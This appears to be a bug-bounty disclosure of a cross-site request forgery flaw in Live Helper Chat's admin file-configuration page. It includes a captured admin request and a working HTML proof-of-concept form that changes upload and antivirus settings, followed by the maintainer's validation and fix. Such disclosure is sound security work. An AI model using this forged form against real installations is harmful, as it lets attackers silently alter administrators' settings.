Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

Valid

Reported on

Jan 14th 2022

Description

A CSRF issue is found in the Settings>Live help configuration>File Configuration. It was found that no CSRF token validation is getting done as no CSRF token is getting passed with the request.

Proof of Concept

Actual Request

POST /site_admin/file/configuration HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 395
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/file/configuration
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=dqj88jnn7p3es1tjobhpvckfj5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

ActiveFileUploadUser=on&ActiveFileUploadAdmin=on&AllowedFileTypes=gif%7Cjpe%3Fg%7Cpng%7Czip%7Crar%7Cxls%7Cdoc%7Cdocx%7Cxlsx%7Cpdf%7Cmp3&AllowedFileTypesUser=gif%7Cjpe%3Fg%7Cpng%7Cdoc%7Cdocx%7Cpdf%7Cmp3&MaximumFileSize=2048&ClamAVSocketPath=%2Fvar%2Frun%2Fclamav%2Fclamd.sock&ClamAVSocketLength=20000&soundMessagesOp=on&soundLength=30&mdays_older=&mdays_older_visitor=&StoreFileConfiguration=Save

You can see that NO CSRF token is getting sent along with the request.

Attacker's POC


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/file/configuration" method="POST">
      <input type="hidden" name="ActiveFileUploadUser" value="on" />
      <input type="hidden" name="ActiveFileUploadAdmin" value="on" />
      <input type="hidden" name="AllowedFileTypes" value="gif&#124;jpe&#63;g&#124;png&#124;zip&#124;rar&#124;xls&#124;doc&#124;docx&#124;xlsx&#124;pdf&#124;mp3" />
      <input type="hidden" name="AllowedFileTypesUser" value="gif&#124;jpe&#63;g&#124;png&#124;doc&#124;docx&#124;pdf&#124;mp3" />
      <input type="hidden" name="MaximumFileSize" value="2048" />
      <input type="hidden" name="ClamAVSocketPath" value="&#47;var&#47;run&#47;clamav&#47;clamd&#46;sock" />
      <input type="hidden" name="ClamAVSocketLength" value="20000" />
      <input type="hidden" name="soundMessagesOp" value="on" />
      <input type="hidden" name="soundLength" value="30" />
      <input type="hidden" name="mdays&#95;older" value="" />
      <input type="hidden" name="mdays&#95;older&#95;visitor" value="" />
      <input type="hidden" name="StoreFileConfiguration" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability can help an attacker to change the admin file configuration settings.

We are processing your report and will contact the livehelperchat team within 24 hours. 4 months ago

shubh123-tri modified the report

4 months ago

Remigijus Kiminas validated this vulnerability 4 months ago

shubh123-tri has been awarded the disclosure bounty

The fix bounty is now up for grabs

Remigijus Kiminas confirmed that a fix has been merged on 6ad134 4 months ago

The fix bounty has been dropped

Jamie Slome

commented 4 months ago

Admin

@maintainer - can you confirm the version of the package that addresses this issue?

to join this conversation